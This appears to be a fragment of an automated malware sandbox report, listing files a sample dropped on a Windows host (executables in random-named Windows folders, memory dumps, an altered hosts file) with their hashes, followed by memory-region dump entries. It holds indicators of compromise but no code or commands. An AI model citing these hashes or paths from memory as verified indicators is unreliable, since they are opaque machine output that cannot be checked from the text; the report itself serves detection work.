                                        93552c6c837a49b271e74ade66458721

                                        SHA1

                                        3424e1c6b4527dd45d19bbc1e42aa9c469dd3b14

                                        SHA256

                                        5d75b89665165019e5b62aa1cc94763dcacb146d26bd0fc8aaf7d4f37000a2a0

                                        SHA512

                                        79600267e0bd5f6b7ca5f27aa2a2971bd2f02db058d494a562038feae4defc3a4a64ab6a48055ca37f52a5671faaa309ad2956998a46e1f78a771a6c16868319

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\1180.dmp
                                        Filesize

                                        1.3MB

                                        MD5

                                        47829f26c17a18e1c21490e1df2be364

                                        SHA1

                                        f3e7279f5272fcba4ac2561633d321f0dc2604a5

                                        SHA256

                                        ba955dc369da9673e5c753e383a18b10036ad18516146d2ca5fa204fc13afe3f

                                        SHA512

                                        91794cccb9270f2372a43aa1b824ea438547a4838c888127ff2dac69e9bd6b10cdf9de0bfe83342bef95530cadbf25e83804ae628a3b204340317c3139423abf

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\1312.dmp
                                        Filesize

                                        4.5MB

                                        MD5

                                        36ed47223ed8a9634b0ac7359433fa00

                                        SHA1

                                        30614d6ce8b1de7f589b2eb5f62c275c161b4486

                                        SHA256

                                        84a363dc0ca1fa066bcccd85e03260580b50e42d6edd2c9a0b55ce5dfdb4fd79

                                        SHA512

                                        eed3786ce17a5a4c8f174b4f489327e51ec1ba1e622bf1db1a07a59119221a21fab266fb4306b884ddb67a14d1859e4a4236af8fbf25565bcd3cdac258407855

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\1560.dmp
                                        Filesize

                                        2.2MB

                                        MD5

                                        637a2bd1fa9c078d3e8dfbd2c3de305b

                                        SHA1

                                        d165dfb09d5ad553c45b2c3f4d6ef26af3ff8d0c

                                        SHA256

                                        754b39394d9ad94a2b89677b41fcfa1352ba195cf4c1bda6425a68986b8198a6

                                        SHA512

                                        72a149137f23f38b343e6165c1a801a43ae8edbe97e275d528bdfb41abede87271866825f7f4d0bbc8df04a8351494c97c7f9dfb38d570fd3fe9319e626ac032

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\1584.dmp
                                        Filesize

                                        5.3MB

                                        MD5

                                        8cb8357c13329513488ef4dc85367dfb

                                        SHA1

                                        5c112c4201839dd2f103f8356afe6b4b9af5e6bc

                                        SHA256

                                        a9fdc86e7137658b860f00a11b02fe6e9fb7cec096f47f38a5e0e5e7d6ec7d75

                                        SHA512

                                        2d9e7916bcc5c2f7d8f2a76191f287d3823ad8b741836c9cce151e5ea56bf01a1f3640f8cc07f9933f532a06136626a93e750d2900520b53478006e722d32720

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\2680.dmp
                                        Filesize

                                        6.8MB

                                        MD5

                                        5386c24ed854e2b845bb0bf45cbd2d93

                                        SHA1

                                        25734ddfdcc2e1a74702707fa988eed6c14a5e0d

                                        SHA256

                                        0f4cb0f0b99815b6dde94cd6227853ec7a45287542e5c4f1b356c7622c21906b

                                        SHA512

                                        cf2ee2d67bee445810ae2f9833cb2ded9b212c6ab0b5610d8c2e992ca8e1a6b7bde3927ba9cb7beea1878b19084eebdb4c9c748c1cd809272555ed55882e6051

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\2692.dmp
                                        Filesize

                                        843KB

                                        MD5

                                        c4e2d4967b5070b751a18fb24372d648

                                        SHA1

                                        016613da2e7bead2dc751d5898ea01fc68ffeca7

                                        SHA256

                                        83829f5bdfc08f15294bb83f5eff23bb7830f1cdabf93ec551391066ffc9af1a

                                        SHA512

                                        6c05b347a66e9f790dae60756ebf5df6ff417d03398e3de548856e22e926b442ca833eed0af8b29c5a325a15cdf03e6408a42bcc5f79da4b43a089b29e0965b2

                                        Download Submit

                                      • C:\Windows\TEMP\ypbgnfgfn\768.dmp
                                        Filesize

                                        4.6MB

                                        MD5

                                        21075c9af7a85c30fe1183e4703405e2

                                        SHA1

                                        c0556d8cca3c765a6a26351f63377d2ce38f7e29

                                        SHA256

                                        d8d65c230716e0a39b0cb18ceaa25dea79d8dcc186bd87160c09743dedc2e956

                                        SHA512

                                        2e8a4c25b2ecf4eba5acc51c550e986cf2cab68156cdf75af98d05f5eaa860806628c585bf508d0be25830d6cfb72abe72ef81d547c4b1396153302ee95217c1

                                        Download Submit

                                      • C:\Windows\Temp\xohudmc.exe
                                        Filesize

                                        72KB

                                        MD5

                                        cbefa7108d0cf4186cdf3a82d6db80cd

                                        SHA1

                                        73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                        SHA256

                                        7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                        SHA512

                                        b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                        Download Submit

                                      • C:\Windows\system32\drivers\etc\hosts
                                        Filesize

                                        975B

                                        MD5

                                        b5d815ff5310f62de5020591be598bc0

                                        SHA1

                                        8013562b0cc2516d16d474308c8982a31b7f5dd0

                                        SHA256

                                        a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85

                                        SHA512

                                        4e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94

                                        Download Submit

                                      • C:\Windows\ypbgnfgfn\livcfcfiu\rjfiekzcc.exe
                                        Filesize

                                        332KB

                                        MD5

                                        ea774c81fe7b5d9708caa278cf3f3c68

                                        SHA1

                                        fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                        SHA256

                                        4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                        SHA512

                                        7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                        Download Submit

                                      • \Windows\Temp\nsj5F03.tmp\System.dll
                                        Filesize

                                        11KB

                                        MD5

                                        2ae993a2ffec0c137eb51c8832691bcb

                                        SHA1

                                        98e0b37b7c14890f8a599f35678af5e9435906e1

                                        SHA256

                                        681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                        SHA512

                                        2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                        Download Submit

                                      • \Windows\Temp\nsj5F03.tmp\nsExec.dll
                                        Filesize

                                        6KB

                                        MD5

                                        b648c78981c02c434d6a04d4422a6198

                                        SHA1

                                        74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                        SHA256

                                        3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                        SHA512

                                        219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                        Download Submit

                                      • \Windows\Temp\tckjwhyci\aktvci.exe
                                        Filesize

                                        343KB

                                        MD5

                                        2b4ac7b362261cb3f6f9583751708064

                                        SHA1

                                        b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                        SHA256

                                        a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                        SHA512

                                        c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                        Download Submit

                                      • \Windows\Temp\ypbgnfgfn\ctjtihzei.exe
                                        Filesize

                                        126KB

                                        MD5

                                        e8d45731654929413d79b3818d6a5011

                                        SHA1

                                        23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                        SHA256

                                        a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                        SHA512

                                        df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                        Download Submit

                                      • \Windows\rtldfmcc\nihkvnz.exe
                                        Filesize

                                        7.6MB

                                        MD5

                                        c14a2c82c4467668628efecf53596e3c

                                        SHA1

                                        ab77beb9cf21b8a804883ac2afd611ca49fdbdcd

                                        SHA256

                                        47ec71f60997578a4eb4fa15338e6411699a6bc68feb428e3861da2063d8f74d

                                        SHA512

                                        369cc4056de86047ad7a9957a7c719d8bcb710f6d0ee3b92fda5be651fbd1e664f1005b8f5209aefb02e75962a163fabe66275015349f9a2e5db0b28ad1c25ce

                                        Download Submit

                                      • \Windows\ypbgnfgfn\Corporate\vfshost.exe
                                        Filesize

                                        381KB

                                        MD5

                                        fd5efccde59e94eec8bb2735aa577b2b

                                        SHA1

                                        51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                        SHA256

                                        441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                        SHA512

                                        74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                        Download Submit

                                      • \Windows\ypbgnfgfn\livcfcfiu\wpcap.exe
                                        Filesize

                                        424KB

                                        MD5

                                        e9c001647c67e12666f27f9984778ad6

                                        SHA1

                                        51961af0a52a2cc3ff2c4149f8d7011490051977

                                        SHA256

                                        7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                        SHA512

                                        56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                        Download Submit

                                      • memory/284-233-0x000000013FF10000-0x000000013FF6B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/572-144-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/572-154-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/940-134-0x0000000000CC0000-0x0000000000DAE000-memory.dmp

                                        Filesize

                                        952KB

                                        Download

                                      • memory/940-135-0x0000000000CC0000-0x0000000000DAE000-memory.dmp

                                        Filesize

                                        952KB

                                        Download

                                      • memory/1564-219-0x000000013FF80000-0x000000013FFDB000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/1616-138-0x000000013F930000-0x000000013FA1E000-memory.dmp

                                        Filesize

                                        952KB

                                        Download

                                      • memory/1616-136-0x000000013F930000-0x000000013FA1E000-memory.dmp

                                        Filesize

                                        952KB

                                        Download

                                      • memory/1716-189-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1716-151-0x0000000000110000-0x0000000000120000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/1716-149-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1716-217-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1716-241-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1716-235-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1716-242-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1716-190-0x000000013F150000-0x000000013F270000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/1856-210-0x000000013FEB0000-0x000000013FF0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/1856-208-0x000000013FEB0000-0x000000013FF0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2000-226-0x000000013F240000-0x000000013F29B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2000-224-0x000000013F240000-0x000000013F29B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2228-75-0x0000000000130000-0x000000000017C000-memory.dmp

                                        Filesize

                                        304KB

                                        Download

                                      • memory/2488-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download

                                      • memory/2488-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download

                                      • memory/2612-183-0x0000000000400000-0x0000000000412000-memory.dmp

                                        Filesize

                                        72KB

                                        Download

                                      • memory/2612-169-0x0000000010000000-0x0000000010008000-memory.dmp

                                        Filesize

                                        32KB

                                        Download

                                      • memory/2776-198-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-194-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-236-0x0000000001AB0000-0x0000000001B0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-142-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-216-0x00000000019B0000-0x0000000001A0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-214-0x0000000001AB0000-0x0000000001B0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-180-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-187-0x0000000002B50000-0x0000000002C70000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/2776-206-0x0000000001AB0000-0x0000000001B0B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-158-0x0000000001E40000-0x0000000001E9B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2776-147-0x0000000002B50000-0x0000000002C70000-memory.dmp

                                        Filesize

                                        1.1MB

                                        Download

                                      • memory/2776-230-0x0000000002560000-0x00000000025BB000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2820-202-0x000000013F8B0000-0x000000013F90B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2820-199-0x000000013F8B0000-0x000000013F90B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2876-188-0x000000013FD30000-0x000000013FD8B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2876-192-0x000000013FD30000-0x000000013FD8B000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2912-160-0x000000013F080000-0x000000013F0DB000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/2912-181-0x000000013F080000-0x000000013F0DB000-memory.dmp

                                        Filesize

                                        364KB

                                        Download

                                      • memory/3036-9-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                        Filesize

                                        6.6MB

                                        Download